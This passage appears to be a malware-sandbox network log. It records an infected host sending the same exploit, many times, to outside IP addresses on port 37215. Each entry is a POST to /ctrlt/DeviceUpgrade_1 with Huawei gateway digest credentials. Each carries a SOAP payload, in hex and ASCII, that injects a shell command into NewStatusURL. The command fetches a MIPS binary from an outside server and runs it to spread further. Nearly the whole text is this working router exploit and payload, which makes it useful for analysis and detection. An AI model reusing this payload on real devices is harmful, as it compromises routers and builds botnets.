                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  466192.168.2.1351156197.37.210.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.282171965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  467192.168.2.134191441.156.64.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.282187939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  468192.168.2.135425841.10.201.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.282213926 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  469192.168.2.134910286.97.169.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.282237053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  470192.168.2.135850041.152.222.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.282254934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  471192.168.2.1335412197.220.33.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.282279015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  472192.168.2.1335002197.129.150.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.282305002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  473192.168.2.135030641.87.82.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286267996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  474192.168.2.1345542197.111.240.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286314011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  475192.168.2.133475841.24.78.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286349058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 